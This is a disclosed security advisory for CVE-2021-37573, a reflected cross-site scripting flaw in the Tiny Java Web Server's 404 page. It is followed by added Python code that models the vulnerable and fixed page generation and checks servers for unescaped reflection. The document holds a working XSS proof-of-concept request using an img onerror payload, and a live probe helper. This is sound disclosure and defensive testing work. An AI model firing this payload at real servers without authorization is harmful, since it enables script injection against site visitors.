A reflected cross-site scripting (XSS) vulnerability in the web server Tiny Java Web Server and Servlet Container (TJWS) <= 1.115 allows an adversary to inject malicious JavaScript into the server's "404 Page Not Found" error page: the requested path is reflected without HTML encoding into the response's title and heading, so a crafted URL executes script in a victim's browser. Fixed in version 1.116.
{"packetstorm": [{"lastseen": "2021-08-16T17:18:20", "description": "", "cvss3": {}, "published": "2021-08-14T00:00:00", "type": "packetstorm", "title": "Tiny Java Web Server 1.115 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-37573"], "modified": "2021-08-14T00:00:00", "id": "PACKETSTORM:163825", "href": "https://packetstormsecurity.com/files/163825/Tiny-Java-Web-Server-1.115-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: SYSS-2021-042 \nProduct: Tiny Java Web Server and Servlet Container \n(TJWS) \nManufacturer: D. Rogatkin \nAffected Versions: <= 1.115 \nTested Versions: 1.107, 1.114 \nVulnerability Type: Cross-Site Scripting (CWE-79) \nRisk Level: Medium \nSolution Status: Fixed \nManufacturer Notification: 2021-07-21 \nSolution Date: 2021-07-23 \nPublic Disclosure: 2021-08-03 \nCVE Reference: CVE-2021-37573 \nAuthor of Advisory: Maurizio Ruchay, SySS GmbH \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nOverview: \n \nTiny Java Web Server and Servlet Container (TJWS) is a lightweight web \nserver written in Java. \n \nThe manufacturer describes the product as follows (see [1]): \n\"The Miniature Java Web Server is built as a servlet container with HTTPD \nservlet providing standard Web server functionality.\" \n \nDue to improper input validation, the application is vulnerable to a \nreflected cross-site scripting attack. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nVulnerability Details: \n \nIt is possible to inject malicious JavaScript code into the server's error \npage \"404 Page Not Found\". \n \nThe given input is not properly validated and therefore reflected back \nand executed in a victim's browser. 
\n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nProof of Concept (PoC): \n \nThe following GET request shows how JavaScript code can be placed on \nthe page: \n \n=== \nHTTP request: \nGET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1 \n[...] \nConnection: close \n \n \nHTTP response: \nHTTP/1.1 404 te<img src=x onerror=alert(42)>st not found \nserver: D. Rogatkin's TJWS (+Android, JSR340, JSR356) \nhttps://github.com/drogatkin/TJWS2.git/Version 1.114 \n[...] \ncontent-length: 338 \nconnection: close \n \n<HTML><HEAD><TITLE>404 te<img src=x onerror=alert(42)>st not \nfound</TITLE></HEAD><BODY BGCOLOR=\"#D1E9FE\"> \n[...] \n<H2>404 te<img src=x onerror=alert(42)>st not found</H2> \n[...] \n=== \n \nIf a browser renders the response, the JavaScript code is executed \nshowing the message \"42\". \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSolution: \n \nThe issue has been addressed in the release version 1.116.[2] \nTherefore, all instances of TJWS should be updated to this version. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nDisclosure Timeline: \n \n2021-07-02: Vulnerability discovered \n2021-07-21: Vulnerability reported to manufacturer \n2021-07-23: Patch released by manufacturer \n2021-08-03: Public disclosure of vulnerability \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nReferences: \n \n[1] Product website for Tiny Java Web Server and Servlet Container (TJWS): \nhttp://tjws.sourceforge.net/ \n[2] Patch release on Github: \nhttps://github.com/drogatkin/TJWS2/releases/tag/v1.116 \n[3] SySS Responsible Disclosure Policy \nhttps://www.syss.de/en/responsible-disclosure-policy \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nCredits: \n \nThis security vulnerability was found by Maurizio Ruchay of SySS GmbH. 
\n \nE-Mail: maurizio.ruchay@syss.de \nPublic Key: \nhttps://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc \nKey ID: 0xC7D20E267F0FA978 \nKey Fingerprint: D506 AB5A FE3E 09AE FFBE DEB2 C7D2 0E26 7F0F A978 \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nDisclaimer: \n \nThe information provided in this security advisory is provided \"as is\" \nand without warranty of any kind. Details of this security advisory may \nbe updated in order to provide as accurate information as possible. The \nlatest version of this security advisory is available on the SySS Web \nsite. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nCopyright: \n \nCreative Commons - Attribution (by) - Version 3.0 \nURL: https://creativecommons.org/licenses/by/3.0/deed.en \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163825/SYSS-2021-042.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}
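The advisory's PoC shows the decoded request path landing verbatim in the status reason, the <TITLE> and the <H2> of the 404 page. The following Python is an added example, not TJWS or SySS code: it models that vulnerable page generation next to a hardened variant that HTML-escapes the path and uses a constant reason phrase, and it carries an offline check that tells "reflected unescaped", "reflected escaped" and "not reflected" apart. The page template, the probe marker (taken from the PoC), the sample response (transcribed from the advisory, headers abbreviated) and the `probe_server` helper are constructed for this example; only run the live probe against hosts you are authorized to test.

```python
"""Reflected XSS via an unescaped request path in a 404 page (CVE-2021-37573 pattern).

Added example: a model of the vulnerable behaviour from the advisory's PoC, a
hardened variant, and a check that classifies how a marker is reflected.
"""
import html
from urllib.parse import quote, unquote

# Probe marker from the advisory's PoC: harmless unless reflected with < > intact.
PROBE = "te<img src=x onerror=alert(42)>st"

# Constructed from the advisory's PoC response (headers abbreviated).
SAMPLE_RESPONSE = (
    "HTTP/1.1 404 te<img src=x onerror=alert(42)>st not found\r\n"
    "server: D. Rogatkin's TJWS (+Android, JSR340, JSR356)\r\n"
    "content-length: 338\r\n"
    "connection: close\r\n\r\n"
    "<HTML><HEAD><TITLE>404 te<img src=x onerror=alert(42)>st not found</TITLE></HEAD>"
    '<BODY BGCOLOR="#D1E9FE"><H2>404 te<img src=x onerror=alert(42)>st not found</H2>'
    "</BODY></HTML>"
)


def probe_path(marker: str = PROBE) -> str:
    """Percent-encode the marker as the PoC request does: < > and space encoded,
    = ( ) left alone, giving /te%3Cimg%20src=x%20onerror=alert(42)%3Est."""
    return "/" + quote(marker, safe="=()")


def vulnerable_404(request_target: str) -> str:
    """Model of TJWS <= 1.115 (assumed template): the decoded path is written
    into the status reason, <TITLE> and <H2> without any encoding."""
    name = unquote(request_target.lstrip("/"))
    return (
        f"HTTP/1.1 404 {name} not found\r\n\r\n"
        f"<HTML><HEAD><TITLE>404 {name} not found</TITLE></HEAD>"
        f'<BODY BGCOLOR="#D1E9FE"><H2>404 {name} not found</H2></BODY></HTML>'
    )


def fixed_404(request_target: str) -> str:
    """Hardened variant (assumed, not the 1.116 patch itself): HTML-escape the
    path before it enters markup and keep user input out of the status line."""
    name = html.escape(unquote(request_target.lstrip("/")), quote=True)
    return (
        "HTTP/1.1 404 Not Found\r\n\r\n"
        f"<HTML><HEAD><TITLE>404 {name} not found</TITLE></HEAD>"
        f'<BODY BGCOLOR="#D1E9FE"><H2>404 {name} not found</H2></BODY></HTML>'
    )


def classify_reflection(response: str, marker: str = PROBE) -> str:
    """'unescaped' if the raw marker (tags intact) appears anywhere in the
    response, 'escaped' if only its HTML-encoded form does, else 'absent'."""
    if marker in response:
        return "unescaped"
    if html.escape(marker, quote=True) in response:
        return "escaped"
    return "absent"


def probe_server(host: str, port: int = 8080, timeout: float = 5.0) -> str:
    """Live check (hypothetical helper, not run offline): send the PoC request
    and classify the reflection in status line plus body."""
    import http.client

    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", probe_path(), headers={"Connection": "close"})
        resp = conn.getresponse()
        text = f"HTTP/1.1 {resp.status} {resp.reason}\r\n" + resp.read().decode("utf-8", "replace")
    finally:
        conn.close()
    return classify_reflection(text)


if __name__ == "__main__":
    target = probe_path()
    print("probe request target:", target)
    print("vulnerable model ->", classify_reflection(vulnerable_404(target)))
    print("fixed model      ->", classify_reflection(fixed_404(target)))
    print("advisory sample  ->", classify_reflection(SAMPLE_RESPONSE))
```

The check deliberately looks at the whole response, not just the body: the PoC shows the marker in the reason phrase too, and a server that escapes the body while still echoing the raw path into the status line has not fully fixed the issue. Treat an "escaped" result as evidence of a patched 1.116-style build and "absent" as a server that does not echo the path at all.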